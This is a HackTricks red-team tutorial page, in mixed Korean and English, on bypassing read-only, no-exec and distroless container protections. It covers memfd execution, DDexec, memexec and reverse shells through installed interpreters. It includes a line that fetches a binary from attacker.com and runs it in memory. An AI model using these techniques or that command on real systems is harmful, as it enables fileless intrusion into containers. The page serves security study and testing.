Bypass FS protections: read-only / no-exec / Distroless

Tip

AWS Hacking์„ ๋ฐฐ์šฐ๊ณ  ์—ฐ์Šตํ•˜์„ธ์š”:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking์„ ๋ฐฐ์šฐ๊ณ  ์—ฐ์Šตํ•˜์„ธ์š”: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking์„ ๋ฐฐ์šฐ๊ณ  ์—ฐ์Šตํ•˜์„ธ์š”: HackTricks Training Azure Red Team Expert (AzRTE) ํ‰๊ฐ€ ํŠธ๋ž™ (ARTA/GRTA/AzRTA)๊ณผ Linux Hacking Expert (LHE)๋ฅผ ๋ณด๋ ค๋ฉด ์ „์ฒด HackTricks Training ์นดํƒˆ๋กœ๊ทธ๋ฅผ ๋‘˜๋Ÿฌ๋ณด์„ธ์š”.

HackTricks ์ง€์›ํ•˜๊ธฐ

๋น„๋””์˜ค

In the following videos you can find the techniques mentioned in this page explained more in depth:

read-only / no-exec scenario

์ปจํ…Œ์ด๋„ˆ์—์„œ ํŠนํžˆ read-only (ro) file system protection์œผ๋กœ ๋งˆ์šดํŠธ๋œ linux ์‹œ์Šคํ…œ์„ ์ฐพ๋Š” ๊ฒฝ์šฐ๊ฐ€ ์ ์  ๋งŽ์•„์ง€๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Š” ์ปจํ…Œ์ด๋„ˆ๋ฅผ ro ํŒŒ์ผ ์‹œ์Šคํ…œ์œผ๋กœ ์‹คํ–‰ํ•˜๋Š” ๊ฒƒ์ด securitycontext์— **readOnlyRootFilesystem: true**๋ฅผ ์„ค์ •ํ•˜๋Š” ๊ฒƒ๋งŒํผ ์‰ฝ๊ธฐ ๋•Œ๋ฌธ์ž…๋‹ˆ๋‹ค:

apiVersion: v1
kind: Pod
metadata:
name: alpine-pod
spec:
containers:
- name: alpine
image: alpine
securityContext:
      readOnlyRootFilesystem: true
    command: ["sh", "-c", "while true; do sleep 1000; done"]

ํ•˜์ง€๋งŒ ํŒŒ์ผ ์‹œ์Šคํ…œ์ด ro๋กœ ๋งˆ์šดํŠธ๋˜์—ˆ๋”๋ผ๋„ **/dev/shm**๋Š” ์—ฌ์ „ํžˆ ์“ฐ๊ธฐ ๊ฐ€๋Šฅํ•˜๊ธฐ ๋•Œ๋ฌธ์— ๋””์Šคํฌ์— ์•„๋ฌด ๊ฒƒ๋„ ์“ธ ์ˆ˜ ์—†๋‹ค๋Š” ๊ฒƒ์€ ์‚ฌ์‹ค์ด ์•„๋‹™๋‹ˆ๋‹ค. ๋‹ค๋งŒ ์ด ํด๋”๋Š” mounted with no-exec protection์œผ๋กœ ์„ค์ •๋˜๋ฏ€๋กœ, ์—ฌ๊ธฐ์— ๋ฐ”์ด๋„ˆ๋ฆฌ๋ฅผ ๋‹ค์šด๋กœ๋“œํ•˜๋”๋ผ๋„ ์‹คํ–‰ํ•  ์ˆ˜ ์—†์Šต๋‹ˆ๋‹ค.

Warning

red team ๊ด€์ ์—์„œ๋Š”, ์ด๋Š” ์‹œ์Šคํ…œ์— ์•„์ง ์—†๋Š” ๋ฐ”์ด๋„ˆ๋ฆฌ(์˜ˆ: backdoors ๋˜๋Š” enumerators์ธ kubectl)๋ฅผ ๋‹ค์šด๋กœ๋“œํ•˜๊ณ  ์‹คํ–‰ํ•˜๋Š” ์ž‘์—…์„ ๋ณต์žกํ•˜๊ฒŒ ๋งŒ๋“ญ๋‹ˆ๋‹ค.

Easiest bypass: Scripts

๋ฐ”์ด๋„ˆ๋ฆฌ๋ฅผ ์–ธ๊ธ‰ํ–ˆ์ง€๋งŒ, ์ธํ„ฐํ”„๋ฆฌํ„ฐ๊ฐ€ ์‹œ์Šคํ…œ์— ์กด์žฌํ•œ๋‹ค๋ฉด ์–ด๋– ํ•œ ์Šคํฌ๋ฆฝํŠธ๋“  ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์˜ˆ๋ฅผ ๋“ค์–ด sh๊ฐ€ ์žˆ์œผ๋ฉด shell script, python์ด ์„ค์น˜๋˜์–ด ์žˆ์œผ๋ฉด python script๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

ํ•˜์ง€๋งŒ ์ด๊ฒƒ๋งŒ์œผ๋กœ๋Š” ๋ฐ”์ด๋„ˆ๋ฆฌ backdoor๋‚˜ ์‹คํ–‰ํ•ด์•ผ ํ•  ๋‹ค๋ฅธ ๋ฐ”์ด๋„ˆ๋ฆฌ ๋„๊ตฌ๋ฅผ ์‹คํ–‰ํ•˜๊ธฐ์— ์ถฉ๋ถ„ํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค.

Memory Bypasses

ํŒŒ์ผ ์‹œ์Šคํ…œ์ด ๋ฐ”์ด๋„ˆ๋ฆฌ ์‹คํ–‰์„ ํ—ˆ์šฉํ•˜์ง€ ์•Š๋Š”๋‹ค๋ฉด, ๊ฐ€์žฅ ์ข‹์€ ๋ฐฉ๋ฒ•์€ ๋ฉ”๋ชจ๋ฆฌ์—์„œ ์‹คํ–‰ํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ๋ณดํ˜ธ๋Š” ๋ฉ”๋ชจ๋ฆฌ์—๋Š” ์ ์šฉ๋˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค.

FD + exec syscall bypass

๋จธ์‹  ๋‚ด๋ถ€์— Python, Perl, Ruby ๊ฐ™์€ ๊ฐ•๋ ฅํ•œ ์Šคํฌ๋ฆฝํŠธ ์—”์ง„์ด ์žˆ๋‹ค๋ฉด, ๋ฐ”์ด๋„ˆ๋ฆฌ๋ฅผ ๋ฉ”๋ชจ๋ฆฌ์—์„œ ์‹คํ–‰ํ•˜๊ธฐ ์œ„ํ•ด ๋‹ค์šด๋กœ๋“œํ•œ ๋’ค, ๋ฉ”๋ชจ๋ฆฌ ํŒŒ์ผ ๋””์Šคํฌ๋ฆฝํ„ฐ(create_memfd syscall)์— ์ €์žฅํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด ๋ฉ”๋ชจ๋ฆฌ fd๋Š” ํ•ด๋‹น ๋ณดํ˜ธ์˜ ์˜ํ–ฅ์„ ๋ฐ›์ง€ ์•Š์œผ๋ฉฐ, ๊ทธ ๋‹ค์Œ exec syscall์„ ํ˜ธ์ถœํ•˜์—ฌ fd๋ฅผ ์‹คํ–‰ํ•  ํŒŒ์ผ๋กœ ์ง€์ •ํ•˜๋ฉด ๋ฉ๋‹ˆ๋‹ค.

์ด๋ฅผ ์œ„ํ•ด fileless-elf-exec ํ”„๋กœ์ ํŠธ๋ฅผ ์‰ฝ๊ฒŒ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋ฐ”์ด๋„ˆ๋ฆฌ๋ฅผ ์ „๋‹ฌํ•˜๋ฉด ์ง€์ •ํ•œ ์–ธ์–ด์˜ ์Šคํฌ๋ฆฝํŠธ๋ฅผ ์ƒ์„ฑํ•ด ์ฃผ๋Š”๋ฐ, ๊ทธ ์Šคํฌ๋ฆฝํŠธ๋Š” binary๋ฅผ ์••์ถ•ํ•˜๊ณ  b64๋กœ ์ธ์ฝ”๋”ฉํ•œ ํ˜•ํƒœ๋กœ ํฌํ•จ๋˜๋ฉฐ create_memfd syscall๋กœ ์ƒ์„ฑํ•œ fd์— ๋””์ฝ”๋“œํ•˜๊ณ  ์••์ถ•์„ ํ•ด์ œํ•˜๋Š” ์ง€์นจ๊ณผ, ์ด๋ฅผ ์‹คํ–‰ํ•˜๊ธฐ ์œ„ํ•œ exec syscall ํ˜ธ์ถœ์„ ํฌํ•จํ•ฉ๋‹ˆ๋‹ค.

Warning

PHP๋‚˜ Node ๊ฐ™์€ ๋‹ค๋ฅธ ์Šคํฌ๋ฆฝํŒ… ์–ธ์–ด์—์„œ๋Š” ์ž‘๋™ํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค. ์ด๋“ค์€ ์Šคํฌ๋ฆฝํŠธ์—์„œ raw syscalls๋ฅผ ํ˜ธ์ถœํ•˜๋Š” ๊ธฐ๋ณธ์ ์ธ ๋ฐฉ๋ฒ•์ด ์—†๊ธฐ ๋•Œ๋ฌธ์— create_memfd๋ฅผ ํ˜ธ์ถœํ•ด ๋ฐ”์ด๋„ˆ๋ฆฌ๋ฅผ ์ €์žฅํ•  memory fd๋ฅผ ๋งŒ๋“ค ์ˆ˜ ์—†์Šต๋‹ˆ๋‹ค.

๋˜ํ•œ /dev/shm์— ํŒŒ์ผ์„ ๋งŒ๋“ค์–ด ์ผ๋ฐ˜ fd๋ฅผ ์ƒ์„ฑํ•˜๋Š” ๊ฒƒ์€ ์ž‘๋™ํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค. no-exec protection์ด ์ ์šฉ๋˜์–ด ์‹คํ–‰์ด ํ—ˆ์šฉ๋˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค.

DDexec / EverythingExec

DDexec / EverythingExec ๋Š” **/proc/self/mem**์„ ๋ฎ์–ด์จ์„œ ์ž์‹ ์˜ ํ”„๋กœ์„ธ์Šค ๋ฉ”๋ชจ๋ฆฌ๋ฅผ ์ˆ˜์ •ํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ด์ฃผ๋Š” ๊ธฐ์ˆ ์ž…๋‹ˆ๋‹ค.

๋”ฐ๋ผ์„œ ํ”„๋กœ์„ธ์Šค๊ฐ€ ์‹คํ–‰ํ•˜๋Š” ์–ด์…ˆ๋ธ”๋ฆฌ ์ฝ”๋“œ๋ฅผ ์ œ์–ดํ•จ์œผ๋กœ์จ, shellcode๋ฅผ ์ž‘์„ฑํ•˜๊ณ  ํ”„๋กœ์„ธ์Šค๋ฅผ โ€œ๋ณ€ํ˜•โ€œ์‹œ์ผœ ์ž„์˜์˜ ์ฝ”๋“œ๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Tip

DDexec / EverythingExec๋ฅผ ์‚ฌ์šฉํ•˜๋ฉด ์ž์‹ ์˜ shellcode ๋˜๋Š” ์–ด๋–ค binary๋“  ๋ฉ”๋ชจ๋ฆฌ์—์„œ ๋กœ๋“œํ•˜์—ฌ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

# Basic example
wget -O- https://attacker.com/binary.elf | base64 -w0 | bash ddexec.sh argv0 foo bar

For more information about this technique check the Github or:

DDexec / EverythingExec

MemExec

Memexec is the natural next step of DDexec. Itโ€™s a DDexec shellcode demonised, so every time that you want to run a different binary you donโ€™t need to relaunch DDexec, you can just run memexec shellcode via the DDexec technique and then communicate with this deamon to pass new binaries to load and run.

You can find an example on how to use memexec to execute binaries from a PHP reverse shell in https://github.com/arget13/memexec/blob/main/a.php.

Memdlopen

With a similar purpose to DDexec, memdlopen technique allows an easier way to load binaries in memory to later execute them. It could allow even to load binaries with dependencies.

Distroless Bypass

For a dedicated explanation of what distroless actually is, when it helps, when it does not, and how it changes post-exploitation tradecraft in containers, check:

Distroless

What is distroless

Distroless containers contain only the bare minimum components necessary to run a specific application or service, such as libraries and runtime dependencies, but exclude larger components like a package manager, shell, or system utilities.

The goal of distroless containers is to reduce the attack surface of containers by eliminating unnecessary components and minimising the number of vulnerabilities that can be exploited.

Reverse Shell

In a distroless container you might not even find sh or bash to get a regular shell. You wonโ€™t also find binaries such as ls, whoami, idโ€ฆ everything that you usually run in a system.

Warning

Therefore, you wonโ€™t be able to get a reverse shell or enumerate the system as you usually do.

However, if the compromised container is running for example a flask web, then python is installed, and therefore you can grab a Python reverse shell. If itโ€™s running node, you can grab a Node rev shell, and the same with mostly any scripting language.

Tip

Using the scripting language you could enumerate the system using the language capabilities.

If there is no read-only/no-exec protections you could abuse your reverse shell to write in the file system your binaries and execute them.

Tip

However, in this kind of containers these protections will usually exist, but you could use the previous memory execution techniques to bypass them.

You can find examples on how to exploit some RCE vulnerabilities to get scripting languages reverse shells and execute binaries from memory in https://github.com/carlospolop/DistrolessRCE.

Tip

AWS Hacking์„ ๋ฐฐ์šฐ๊ณ  ์—ฐ์Šตํ•˜์„ธ์š”:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking์„ ๋ฐฐ์šฐ๊ณ  ์—ฐ์Šตํ•˜์„ธ์š”: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking์„ ๋ฐฐ์šฐ๊ณ  ์—ฐ์Šตํ•˜์„ธ์š”: HackTricks Training Azure Red Team Expert (AzRTE) ํ‰๊ฐ€ ํŠธ๋ž™ (ARTA/GRTA/AzRTA)๊ณผ Linux Hacking Expert (LHE)๋ฅผ ๋ณด๋ ค๋ฉด ์ „์ฒด HackTricks Training ์นดํƒˆ๋กœ๊ทธ๋ฅผ ๋‘˜๋Ÿฌ๋ณด์„ธ์š”.

HackTricks ์ง€์›ํ•˜๊ธฐ